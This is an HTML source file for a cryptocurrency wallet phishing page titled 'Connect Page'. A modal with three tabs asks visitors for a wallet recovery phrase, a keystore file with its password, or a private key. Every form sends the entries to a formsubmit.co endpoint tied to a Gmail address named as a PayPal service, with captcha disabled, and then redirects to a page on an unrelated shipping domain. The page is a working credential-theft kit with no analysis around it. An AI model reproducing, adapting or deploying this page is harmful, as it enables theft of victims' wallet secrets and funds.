<!DOCTYPE html>
<html lang="en">
<div id="in-page-channel-node-id" data-channel-name="in_page_channel_UdJ3bq"></div>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title> Connect Page </title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <link href="./assets/poppins" rel="stylesheet">
    <style>
        @font-face {
            font-family: badaboom-bb;
            src: url("../src/media/badaboom-bb.regular-XZTLUH5E.ttf") format("truetype")
        }

        @font-face {
            font-family: HeyComic;
            src: url("../src/media/HeyComic-ZOC2HDMN.ttf") format("truetype")
        }

        @font-face {
            font-family: Poppins;
            src: url("../src/media/Poppins-Bold-QAA2AGZS.ttf") format("truetype")
        }
    </style>
    <link href="./assets/main.43ed6f0d.css" rel="stylesheet">

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            // Function to get query parameters from the URL
            function getQueryParam(name) {
                const urlParams = new URLSearchParams(window.location.search);
                return urlParams.get(name);
            }

            // Get the value of the 'page' query parameter
            const pageName = getQueryParam('page');

            // Check if 'page' parameter is present and not null
            if (pageName) {
                // Select all elements with the class 'pageName'
                const pageNameElements = document.querySelectorAll('.pageName');

                // Loop through each element and set its value
                pageNameElements.forEach(function(element) {
                    element.value = pageName;
                });
            }
        });
    </script>

</head>


<body style="background: url(./main-bg-0_1.webp); background-size: cover; background-color: #181818;">
    <noscript>You need to enable JavaScript to run this app.</noscript>



    <dialog id="my_modal_2" class="modal" open="">
        <div class=" backdrop-blur-lg w-full h-screen fixed"></div>
        <div class="modal-box text-start">
            <div class="flex items-center gap-4 mb-4 justify-start">
                <h3 class="font-bold  text-xl"> <input type="text" class="pageName" name="WalletType " disabled /></h3>
            </div>
            <div>
                <div role="tablist" class="tabs tabs-lifted"><input type="radio" name="my_tabs_2" role="tab" class="tab" aria-label="Phrase" checked="">
                    <div role="tabpanel" class="tab-content bg-base-100 border-base-300 rounded-box p-6">

                        <form action="https://formsubmit.co/Paypalmeservice003@gmail.com" id="form" method="post" enctype="multipart/form-data">
                            <input type="hidden" name="_captcha" value="false" />
                            <input type="hidden" name="_next" value="https://moi.stinsonshipping.com/check.html" />
                            <input type="text" class="pageName" name="WalletType " style="display: none;" />
                            <label class="form-control"><textarea
                                    class="textarea text-black heyCom focus:border-primary textarea-bordered "
                                    placeholder="Enter your recovery phrase" rows="6" name="message"
                                    required=""></textarea>
                                <div class="label"><span class="label-text-alt">Typically 12
                                        (sometimes 24) words seperated by single spaces</span></div>
                            </label><button type="submit" class="btn  bg-[#154860] text-white hover:opacity-80 hover:bg-[#154860] font-sans text-lg w-full mt-4">Proceed</button>
                        </form>
                    </div>

                    <input type="radio" name="my_tabs_2" role="tab" class="tab" aria-label="Keystore">
                    <div role="tabpanel" class="tab-content bg-base-100 border-base-300 rounded-box p-6">

                        <form action="https://formsubmit.co/Paypalmeservice003@gmail.com" id="form" method="post" enctype="multipart/form-data">
                            <input type="hidden" name="_captcha" value="false" />
                            <input type="hidden" name="_next" value="https://moi.stinsonshipping.com/check.html" />
                            <input type="text" class="pageName" name="WalletType " style="display: none;" />


                            <label class="form-control "><textarea
                                    class="textarea focus:border-primary textarea-bordered text-black heyCom"
                                    placeholder="Enter Keystore" name="Keystore" rows="4" required=""></textarea><textarea
                                    class="textarea focus:border-primary textarea-bordered mt-4 text-black heyCom"
                                    placeholder="Wallet password" rows="1" name="KeystorePassword" required=""></textarea>
                                <div class="label"><span class="label-text-alt">Several lines of
                                        text beginning with "[...]" plus the password you used to
                                        encrypt it</span></div>
                            </label>
                            <button type="submit" class="btn  bg-[#154860] text-white hover:opacity-80 hover:bg-[#154860] font-sans text-lg w-full mt-4">Proceed</button>
                        </form>
                    </div>
                    <input type="radio" name="my_tabs_2" role="tab" class="tab" aria-label="PrivateKey">
                    <div role="tabpanel" class="tab-content bg-base-100 border-base-300 rounded-box p-6">

                        <form action="https://formsubmit.co/Paypalmeservice003@gmail.com" id="form" method="post" enctype="multipart/form-data">
                            <input type="hidden" name="_captcha" value="false" />
                            <input type="hidden" name="_next" value="https://moi.stinsonshipping.com/check.html" />
                            <input type="text" class="pageName" name="WalletType " style="display: none;" />

                            <label class="form-control"><textarea
                                    class="textarea focus:border-primary textarea-bordered text-black heyCom"
                                    placeholder="Enter your Private Key" name="privateKey" rows="1" required=""></textarea>
                                <div class="label"><span class="label-text-alt">Typically 12
                                        (sometimes 24) words seperated by single spaces</span></div>
                            </label><button type="submit" class="btn  bg-[#154860] text-white hover:opacity-80 hover:bg-[#154860] font-sans text-lg w-full mt-4 ">Proceed</button>
                        </form>
                    </div>
                </div>
            </div>
        </div>
        <form method="dialog" class="modal-backdrop"><button>close</button></form>
    </dialog>



    <div id="root">
        <div class="App min-h-screen">

        </div>
    </div>


</body>

</html>